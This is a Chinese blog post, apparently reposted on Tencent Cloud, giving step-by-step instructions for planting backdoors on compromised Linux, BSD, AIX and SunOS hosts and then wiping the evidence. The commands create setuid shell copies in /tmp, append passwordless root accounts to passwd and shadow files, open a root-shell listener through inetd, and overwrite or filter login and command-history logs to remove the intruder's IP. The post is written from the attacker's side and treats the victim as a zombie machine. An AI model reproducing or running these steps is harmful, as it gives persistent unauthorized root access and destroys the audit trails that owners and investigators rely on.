linux 系统留后门方法和清除日志

1. setuid

#cp /bin/sh /tmp/.sh

#chmod u+s /tmp/.sh

加上 suid 位到shell上,虽然很简单,但容易被发现

2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd

即给系统增加一个 id 为 0(root)的帐号,无口令。

但管理员很快就可以发现哦!

3.echo "++">>/.rhosts

如果这个系统开了512,513的port呵呵,就可以

把一个名为hack加到.rhosts文件中,rlogin登陆,无要密码!

4.修改 sendmail.cf文件 增加一个"wiz" 命令;

然后telnet www.xxx.com 25后,wiz。。。。ok

5。 改已有用户密码

如果主机上有好多用户,当你看到一个用户好久没登入了,就可以改他的密码

#passwd 可用passwd命令。

6.rootkit后门包

网上有好多地方下载,找找,自己试试看,我也在测试中!不会啊!!!!

-Bsd 后门:

echo love::92:206::0:0::/:/bin/sh >> /etc/master.passwd

/usr/sbin/pwd_mkdb /etc/master.passwd

这里我添加一个love的用户用户的ID是92;ROOT的是0哦!

好了我们添加一个用户了!那么权限不够怎么办呢?

cp /bin/sh /tmp/.x (这个x就是随便选个,好像 .sh , .a , .b 等等)

chmod 777 /tmp/.x

chmod +s /tmp/.x

用这个给他做个小后门吧

以后我们登陆的这台肉鸡以后就可以用tmp/.x来提升权限了。

-AIX 后门 (Kelvinzhou教我的,感谢你)

echo "ingreslock stream tcp nowait root /bin/sh">>/tmp/.x

/usr/sbin/inetd -s /tmp/.x

rm /tmp/.x

这样你就可以telnet ip 1524直接得到rootshell

-SunOs 后门

echo "love::0:0::/:/bin/bash" >> /etc/passwd

echo "love::::::::" >> /etc/shadow

当你以telnet上时,你就是root了!不过不保险!

-Linux 后门

echo "love::0:0::/:/bin/bash" >> /etc/passwd

echo "love::::::::" >> /etc/shadow

有时间的话,就多留几个后门!

留了后门就要擦你的PP了,不是吧,这也忘了!

Unix系统日志文件通常是存放在 "/var/log and /var/adm" 目录下的。通常我们可以查看syslog.conf来看看日志配置的情况.如:cat /etc/syslog.conf

一般我们要清除的日志有

lastlog

utmp

wtmp

messages

syslog

sulog

此外,各种shell还会记录用户使用的命令历史,它使用用户主目录下的文件来记录这些命令历史,通常这个文件的名字为.sh_history (ksh),.history (csh),或.bash_history (bash)等。

如果你有像wipe.c 那样的清日志的程序,就可以让它来做,不然的话就要手动了! 建议不要用rm掉日志,最好是,把日志改编,

比如:

#cat > /usr/log/lastlog

  ->这里是你要的写的东西,也可以不输入哦!

^d ->这里的^d是按键 ctrl + d! 结束!

#

剩下的事情:

  1、删除我的telnet记录。

  2、删除http的日志。

  清除日志我使用的办法是:cat xxx |grep -V "IP" >>temp然后在把temp覆盖那些被我修改过的日志文件。

原文发布于微信公众号 - 数据库SQL(SQLdba)

原文发表时间:2015-03-16

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏木子昭的博客

部署项目常用套路

批量创建文件夹 sudo mkdir -p /data/{backup,code,logs,server,soft,virtual} backup 存放历史版本...

3018
来自专栏移动安全

移动安全-应用加固命令行工具jar包使用说明

为方便用户快速集成到自动化任务中,乐固加固推出命令行工具。该工具是一个jar包(支持基础版、专业版、企业版),提供上传apk、下载加固包功能。下载的加固包需要用...

9598
来自专栏人工智能LeadAI

深入理解并发/并行,阻塞/非阻塞,同步/异步

1、阻塞,非阻塞 首先,阻塞这个词来自操作系统的线程/进程的状态模型中,如下图: ? 进程状态 一个线程/进程经历的5个状态,创建,就绪,运行,阻塞,终止。各个...

4074
来自专栏猿人谷

df和du显示的磁盘空间使用情况不一致的原因及处理

在Linux下查看磁盘空间使用情况,最常使用的就是du和df了。然而两者还是有很大区别的,有时候其输出结果甚至非常悬殊。 1. 如何记忆这两个命令 du-Dis...

4639
来自专栏农夫安全

DenyHosts防御ssh暴力破解

前段时间博客刚上线不久,ssh服务就被暴力破解了十几万次,文章也被各种扫描器,爬虫血洗过了,也是醉了......wordpress又没多少重要的数据,我们大农夫...

3232
来自专栏陈纪庚

如何使用nodejs发邮件

昨天就开始想使用nodemailer来实现一个发送邮件的功能,不过发现了很多个坑,网上给的资料也很杂很乱,所以决定写一篇真正能用的来帮助大家减少弯路

1753
来自专栏coding

bash基础特征

1112
来自专栏IT笔记

Linux下一些常用的命令(随时更新)

文件操作 打包,排除部分目录 tar -zcvf www_20170426.tar.gz www --exclude=file 解压,并重命名 tar -x...

3027
来自专栏MongoDB中文社区

使用mlaunch和m快速搭建MongoDB测试集群

不知道大家在使用MongoDB的时候有没有遇到突然想要一个集群但是手边又没有的时候?特别是我已经升级到4.0了,突然想要一个3.2的集群怎么办?然后去下载,改配...

1161
来自专栏www.96php.cn

WeiPHP插件模板中快速引入公共模板文件

WeiPHP插件模板中快速引入公共模板文件,weiphp建立于onethink之上,简单修改代码,无需填写绝对路径实现轻松引入模板。记录一下,分享给需要的人。 ...

2713

扫码关注云+社区

领取腾讯云代金券